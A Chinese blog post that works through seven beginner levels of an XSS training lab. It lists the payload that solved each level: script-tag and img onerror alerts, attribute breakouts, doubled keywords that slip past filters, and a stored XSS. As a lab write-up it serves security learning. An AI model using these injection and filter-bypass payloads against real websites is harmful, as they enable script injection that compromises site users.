XSS漏洞基础练习

于 2024-05-10 17:09:14 发布
阅读量303 收藏 5
点赞数 1
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44396970/article/details/138665373
版权

练习平台:云演–零基础入门-xss漏洞实验
在这里插入图片描述
练习1:直接输出

<script>alert("flag")</script>

在这里插入图片描述
练习2:value
输入flag后,查看源代码发现input标签中value=‘flag’
在这里插入图片描述
采用闭合标签的方式绕过

'><img src=1 onerror=alert("flag")>

src属性是规定显示图像的URL,onerror为发生错误时执行的命令,当url有误时,执行alert弹窗
在这里插入图片描述
练习3:XSS过滤简单
输入’><img src=1 οnerrοr=alert(“flag”)>后查看源代码,发现alert消失了在这里插入图片描述
双写alert函数绕过

"><img src=1 οnerrοr=alalertert("flag")>

在这里插入图片描述
练习4:XSS过滤简单
直接输入"><img src=1 οnerrοr=alert(“flag”)>脚本执行出错终止运行显示error,换成其他弹窗函数

"><img src=1 οnerrοr=prompt("flag")>

在这里插入图片描述
练习5:XSS过滤稍难
在这里插入图片描述
过滤内容增多,img,on(error)和alert都被过滤了,都使用双写

"><imimgg src=1 oonnerror=alealertrt("flag")>

练习6:XSS过滤困难
img,on,alert,<都被过滤,结合程序执行顺序即危险字符删除顺序进行双写,注意双引号要改成单引号,否则alert无法触发

aaa" oimgnclick="alimgert('flag')

提交后不会直接弹窗,点击一下输入框在这里插入图片描述

练习7:存储性XSS

填写后,输入的数据会被保存下来,点击查询输入ID可以查到刚刚输入的name

name:<script>alert("flag")</script>

在这里插入图片描述

十七vvvvvv
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA靶场XSS三种类型漏洞练习
c_programj的博客
05-14 1682
DVWA靶场XSS三种漏洞练习反射型XSS(非持久性)【low】【Medium】【High】【Impossible】存储型XSS(持久性)【Low】【Medium】【High】【Impossible】DOM型【Low】【Medium】【High】【Impossible】总结:XSS漏洞常见函数: 反射型XSS(非持久性) 反射型 【low】 后台码源: <?php header ("X-XSS-Protection: 0"); // Is there any input? if
XSS漏洞(综合练习)——渗透day09
qq_62716256的博客
09-06 657
XSS漏洞(综合练习)——day09x
pikachu靶场XSS漏洞通关
最新发布
Zqinglele的博客
04-19 2004
存储型是将攻击者在留言板等输入框中输入的恶意代码直接存入数据库中,由于数据库不识别js代码,一旦有用户打开存有恶意代码的网页界面,那么恶意代码就会被从数据库中读出,是一类危害最大的xss攻击。dom型又称self-xss,攻击者利用dom节点的结构在网页中插入一段恶意代码,这段代码被简单处理或未处理后又在网页中的一个位置显示出来,攻击过程中所有恶意代码均在前端执行。在用户点击被攻击者插入恶意代码的网页链接后,恶意代码在被攻击者的网页中被执行。尝试插入payload,发现是有长度限制,不能把这句完整插入。
XSS漏洞利用 + owasp练习
bin789456的博客
10-25 556
写在前面 靶场链接:https://github.com/do0dl3/xss-labs
【安全】P 4-23 编码转义介绍
Z_David_Z的博客
02-21 416
目录0X01 URL编码0X02 html编码0X03 JavaScript编码0X04 编码含义 0X01 URL编码 url的设计者,考虑到安全传输问,防止url字符丢失,所以选用了相对较小的、通用的安全字母表。另一方面,url的设计者希望url是完整的,有时候需要url中包含除去通用安全字母表之外的二进制数据和字符(比如中文)。所以url引入了一种转义机制,将不安全的字符编码为安全字符再进行传输。 百分号编码:url编码包含一个百分号(%),后面跟着两个表示字符ASCII码的十六进制数。例如:空格转
xss平台搭建源码,xss漏洞练习
06-03
4. 实践利用XSS漏洞进行攻击,如钓鱼、会话劫持、cookies盗窃等,并学习如何防止这些攻击。 四、进一步学习资源 1. OWASP XSS Prevention Cheat Sheet:提供有效的防御XSS攻击的建议。 2. W3Schools JavaScript教程...
pikachu漏洞练习环境
10-25
在这样的练习环境中,你可能会遇到诸如SQL注入、跨站脚本(XSS)、命令注入、文件包含、权限绕过等常见的Web漏洞类型。这些漏洞都是网络应用中常见的安全隐患,理解和掌握它们对于网络安全专业人员来说至关重要。 ...
xsser.7z漏洞练习靶场
01-03
通过深入学习和实践这个“Xsser.7z漏洞练习靶场”,你将能够增强对XSS漏洞的理解,提高安全防护能力,并为实际工作中的安全审计和渗透测试打下坚实基础。同时,这也提醒我们,无论是开发者还是运维人员,都需要时刻...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
漏洞服务器资源
12-07
这个应用包含了大量常见的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等。用户可以通过DVWA来学习如何利用这些漏洞,并理解如何防止它们在实际项目中出现。在使用DVWA时,你可以通过改变其安全...
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
xss类型目总结及例分析
limenzzz的博客
04-23 4182
一、XSS原理 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,之间的字符是页面的标等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段Ja
反射型XSS漏洞练习与总结
王嘟嘟的博客
09-17 2369
0x00 前言 对自己学习xss所遇到的情况以及练习记录,以及自己的感悟进行一个总结。 目录 0x01 …………….DVWA 0x02 …………….xss-quiz.int21h.jp 0x01 DVWA 1.low https://blog.csdn.net/qq_36869808/article/details/82726751 2.Medium https://blog...
安全服务面试总结(第五弹 XSS 跨站脚本漏洞
qq_42488061的博客
09-25 276
XSS,跨站脚本攻击,在owasp常见漏洞排行中排第三名,是最常见的web安全漏洞之一。 xss存在的原因只要是攻击者在网页中嵌入恶意的攻击脚本,通常是JavaScript编辑的恶意代码。 存在xss漏洞的网站,可以轻松盗取Cookie、改变网页内容、URL跳转等一系列的危害。 xss主要分为以下三种类型反射性XSS,存储型xss还有DOM型XSS。 反射型xss 存储型xss Dom型xss ...
回顾几个常见的XSS漏洞测试脚本
山兔的博客
04-29 1453
回顾几个常见的XSS漏洞测试脚本 基础的测试: <script>alert('xss')</script> 如果过滤了指定标签 比如:<script>标签 <img src=x onerror="alert('xss')"/> --常用的on事件:onerror(), onclick(), onmouseover()等 如果标签都被过滤了,可以考虑编码(但需要注意编码输出点是否会解析) <a href="data:text/html;base64,PHN
XSS漏洞总结之小试牛刀
热门推荐
MX的博客
06-20 1万+
一:XSS漏洞总结 1&amp;amp;amp;gt;:简介 XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。 2&amp;amp;amp;gt;: 分类及危害 XSS分类: 反射型: 非持久性XSS攻击,当用户访问已被插入攻击代码的链接时,攻击代码执行,完成该次攻击。 存
XSS练习平台【XSS Challenges】
taozijun的博客
07-31 1万+
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈。这是一个模仿真实xss挖洞的情景,在XSS Challenges练习过程中,我们需要用浏览器中的f12中搜索(),找出我们控制的代码所在的位置,然后思考那些个位置哪个或哪几个位置可以被注入我们想要的代码,然后结合上下文进行各种脑洞绕过。...
面试XSS攻击
qq_39581763的博客
05-14 720
XSS跨域脚本攻击原理无需登录认证,核心原理就是向你的页面注入脚本。1、反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。2、存储型:存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码。(例如:常见的评论,在文本框中输入一段代码,那么就会存放在数据库当中,当再次加载的时候便会执行这样的代码)。常见的场景留言、评论、注册、
SOC网络安全目300.doc
06-07
SOC网络平安目300 Lt D SOC 单项选择120 多项选择60 判断90 简答30小 合计300 一.单项选择〔共120小〕 1.在网页上点击一个链接是使用哪种方式提交的请求? A.GET B.POST C.HEAD D.RACE 正确答案:A; 2.对于单次SQL注入最可能会用到以下哪组字符? A.双引号 B.单引号 C.# D.— 正确答案:B; 3.仅根据扩展名判断,以下哪个文件不是动态页面? 正确答案:D; 4.关于XSS的说法以下哪项是正确的? A.XSS全称为Cascading Style Sheet B.通过XSS无法修改显示的页面内容 C.通过XSS有可能取得被攻击客户端的Cookie D.XSS是一种利用客户端漏洞实施的攻击 正确答案:C; 5.在应用程序中接收到如下内容,请选出对其可信任程度描述正确的一项。 A.来自设置为不可编辑的输入框的内容可信任 B.来自设置为隐藏域的内容可信任 C.来自客户端提交Cookie的内容可信任 D.来自客户端提交的Agent域的内容可信任 E.以上内容均不可信 正确答案:E; 6. 中如提交多个参数通过以下哪个符号进行分隔? A.; B., C.& D.+ 正确答案:C; 7.通过以下哪种方法可最为有效地防止在中括号参数处产生SQL注入?select * from users where age<[18] and male=1; A.过滤输入中的单引号 B.过滤输入中的分号.--及#;过滤输入中的空格.TAB(\t) C.如输入参数非正整数那么认为非法,不再进行SQL查询 D.过滤关键字and、or 正确答案:D; 8.端口扫描使用的最常见协议是 A.TCP B.UDP C.ICMP 正确答案:A; 9.判断主机存活最常用协议是 A.TCP B.UDP C.ICMP 正确答案:C; 10.哪种扫描器不能对Web应用的平安性问进行评估 A.Webinspect B.APPscan C.Nmap 正确答案:C; 11.微软何类产品的漏洞利用方式与挂马相关 A.操作系统 B.浏览器 C.Office 正确答案:B; 12.以下关于僵尸网络的正确答案是 A.拒绝效劳攻击 B.垃圾邮件 C.网络钓鱼 D.以上均是 正确答案:D; 13.口令平安不取决于 A.口令长度 B.口令复杂度 C.口令的更换周期 D.口令是否合理存放 E.口令是否便于记忆 正确答案:E; 14.风险评估应当以什么为核心 A.脆弱性 B.威胁 C.资产 正确答案:C; 15.以下哪种攻击手法对终端平安产生的威胁最大 A.网站挂马 B.黑客利用某系统漏洞〔如MS06-040〕进行远程渗透 C.嗅探 D.黑客攻击某企业门户网站,造成网站不可访问 正确答案:A; 16.以下内容不属于信息平安的"CIA〞属性的是 A.机密性 B.不可篡改性 C.完整性 D.可用性 正确答案:B; 17.在windows系统中,查看共享情况使用的命令是 A.net use B.net share C.net ping D.arp –a 正确答案:B; 18.国际常见的信息平安管理体系标准是 A.Cobit B.COSO C.SOX D.ISO27001 正确答案:D; 19.显示C盘上所有创立时间的递归式目录清单的命令是 A.dir /t:a /a /s /o:d c:\ B.dir /t:w /a /s /o:d c:\ C.dir /t:c /a /s /o:d c:\ D.dir /a /s /o:d c:\ 正确答案:C; 20.Windows系统的系统日志存放在 A.c:\windows\system32\config B.c:\windows\config C.c:\windows\logs D.c:\windows\system32\logs 正确答案:A; 21.如果/etc/passwd文件中存在多个UID为0的用户,可能是 A.系统被DDOS攻击 B.管理员配置错误 C.系统被入侵并添加了管理员用户 D.计算机被感染病毒 正确答案:C; 22.以下哪个命令可以查看ssh效劳端软件包是否被修改 A.rpm –v ssh B.rpm –V sshd C.rpm –aq D.rpm –V ssh 正确答案:D; 23.在linux中存放用户信息的文件是 A./etc/passwd B./etc/login.def C./etc/shadow D./etc/group 正确答案:A; 24.发现入侵后,哪些动作是可以马上执行的 A.重启 B.关机 C.切断网络 D.进入单用户模式 正确答案:C; 25.删除linux中无用的账号,使用的命令是 A..userdel username B.userm

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值